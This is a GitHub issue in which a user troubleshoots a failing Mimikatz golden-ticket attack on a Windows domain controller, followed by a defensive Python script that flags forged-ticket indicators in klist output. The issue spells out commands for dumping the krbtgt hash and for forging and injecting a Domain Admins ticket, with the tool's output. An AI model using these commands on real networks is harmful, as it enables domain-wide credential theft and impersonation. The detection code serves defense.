
ISSUE: Losing tickets when attempting to use the Mimikatz golden module

Open rick-engle opened this issue 2 years ago • 8 comments

I have been going through many of your wikis and various articles on Mimikatz and cannot understand why I can’t get the Golden Ticket attack to work. I am injecting a golden ticket into my session but as soon as I try an elevated privilege command like dir \\servername\c$, running klist shows me that my ticket is no longer cached.

I am running Mimikatz on a non-domain joined Windows 10 PC that is on the same network as an unpatched Windows Server 2012 R2 Domain Controller.

I have the SID of my domain controller (sid:S-1-5-21…) the full domain name, and the hash for my krbtgt account. I got the NTLM HASH for the krbtgt account like this:

    mimikatz # lsadump::lsa /inject /name:krbtgt
    Domain : MYDOMAIN / S-1-5-21-4053458607-1441617025-XXXXXXXXXX

    RID  : 000001f6 (502)
    User : krbtgt

     * Primary
        NTLM : 09a4891da94d1f2522afdc7c4dd09b7b
        LM   :
      Hash NTLM: 09a4891da94d1f2522afdc7c4dd09b7b
        ntlm- 0: 09a4891da94d1f2522afdc7c4dd09b7b
        lm  - 0: 59968800dc52757ec5fe14f86b2103cd

Then I run this command in Mimikatz, which is successful:

    kerberos::golden /user:baduser1 /domain:mydomain.com /sid:S-1-5-21-4053458607-1441617025-XXXXXXXXXX /krbtgt:09a4891da94d1f2522afdc7c4dd09b7b /ptt

    mimikatz # kerberos::golden /user:baduser1 /domain:toondom2.com /sid:S-1-5-21-4053458607-1441617025-3390084498 /krbtgt:09a4891da94d1f2522afdc7c4dd09b7b /ptt

      .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
     .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
     ## / \ ##  /*** Benjamin DELPY gentilkiwi ( [email protected] )
     ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
     '## v ##'       Vincent LE TOUX             ( [email protected] )
      '#####'        > https://pingcastle.com/ / https://mysmartlogon.com/ ***/

    User      : baduser1
    Domain    : mydomain.com (MYDOMAIN)
    SID       : S-1-5-21-4053458607-1441617025-XXXXXXXXXX
    User Id   : 500
    Groups Id : *513 512 520 518 519
    ServiceKey: 09a4891da94d1f2522afdc7c4dd09b7b - rc4_hmac_nt
    Lifetime  : 12/19/2022 5:59:20 PM ; 12/16/2032 5:59:20 PM ; 12/16/2032 5:59:20 PM
    -> Ticket : ** Pass The Ticket **

     * PAC generated
     * PAC signed
     * EncTicketPart generated
     * EncTicketPart encrypted
     * KrbCred generated

    Golden ticket for 'baduser1 @ mydomain.com' successfully submitted for current session

I then exit Mimikatz, and check my ticket with klist and I see my ticket:

    Current LogonId is 0:0xab242d

    Cached Tickets: (1)

    #0>     Client: baduser1 @ toondom2.com
            Server: krbtgt/mydomain.com @ mydomain.com
            KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
            Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
            Start Time: 12/19/2022 17:59:20 (local)
            End Time:   12/16/2032 17:59:20 (local)
            Renew Time: 12/16/2032 17:59:20 (local)
            Session Key Type: RSADSI RC4-HMAC(NT)
            Cache Flags: 0x1 -> PRIMARY
            Kdc Called:

But then as soon as I try to access my domain controller using something like this:

    C:\Attackfolder\x64>dir \\DC1.mydomain.com\c$
    The username or password is incorrect.

And then running klist again:

    Current LogonId is 0:0xab242d

    Cached Tickets: (0)

I have tried so many different options in Mimikatz and while all of the articles seem to make it look very simple, my ticket is always removed/revoked, and I don’t succeed in the attack.

Do you see what I’m doing wrong and have a suggestion?

rick-engle, Jan 12 '23 18:01
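Added example, written for this page and not part of the issue or of mimikatz: a small Python checker that parses klist output like the one quoted above and flags the properties a defender would treat as forged-TGT indicators (a lifetime far beyond the ticket policy maximum, a client realm that differs from the service realm, an RC4 ticket, and no KDC recorded for the ticket). The sample is the issue's own klist output reflowed and trimmed to the fields that are checked; the 10-hour maximum is the Active Directory default and is assumed for this domain.

```python
import re
from datetime import datetime, timedelta
# Constructed sample: the klist output quoted in the issue above, reflowed one field per line.
KLIST_SAMPLE = """Current LogonId is 0:0xab242d
Cached Tickets: (1)
#0>     Client: baduser1 @ toondom2.com
        Server: krbtgt/mydomain.com @ mydomain.com
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Start Time: 12/19/2022 17:59:20 (local)
        End Time:   12/16/2032 17:59:20 (local)
        Kdc Called:
"""

MAX_TGT_LIFETIME = timedelta(hours=10)  # AD default "Maximum lifetime for user ticket" (assumed here)

def field(chunk, label):
    # Value after "Label:" within one ticket's text; "" when the label is absent or empty.
    m = re.search(re.escape(label) + r":?[ \t]*(.*)", chunk)
    return m.group(1).strip() if m else ""

def parse_time(value):
    return datetime.strptime(value.replace("(local)", "").strip(), "%m/%d/%Y %H:%M:%S")

def parse_klist(text):
    # Split on the "#N>" ticket markers and keep only the fields the checks below need.
    tickets = []
    for chunk in re.split(r"^#\d+>", text, flags=re.M)[1:]:
        tickets.append({
            "client": field(chunk, "Client"), "server": field(chunk, "Server"),
            "etype": field(chunk, "KerbTicket Encryption Type"),
            "start": parse_time(field(chunk, "Start Time")),
            "end": parse_time(field(chunk, "End Time")),
            "kdc": field(chunk, "Kdc Called"),
        })
    return tickets

def forged_tgt_indicators(t):
    # Heuristics a defender can apply to a cached TGT; each is weak alone, together they are telling.
    realm = lambda principal: principal.rsplit("@", 1)[-1].strip().lower()
    findings = []
    if t["end"] - t["start"] > MAX_TGT_LIFETIME:
        findings.append("LIFETIME_EXCEEDS_POLICY")  # ten-year ticket against a ten-hour policy
    if realm(t["client"]) != realm(t["server"]):
        findings.append("REALM_MISMATCH")           # baduser1 @ toondom2.com vs krbtgt/mydomain.com @ mydomain.com
    if "RC4" in t["etype"].upper():
        findings.append("RC4_ENCRYPTION")           # key derived from an NTLM hash; AES is the norm for a user TGT
    if not t["kdc"]:
        findings.append("NO_KDC_CALLED")            # LSA never contacted a KDC: the ticket was injected, not issued
    return findings
```

The same checks can be run against the klist output of any logon session; a genuine TGT issued by a DC shows the KDC name, a lifetime within policy and matching realms.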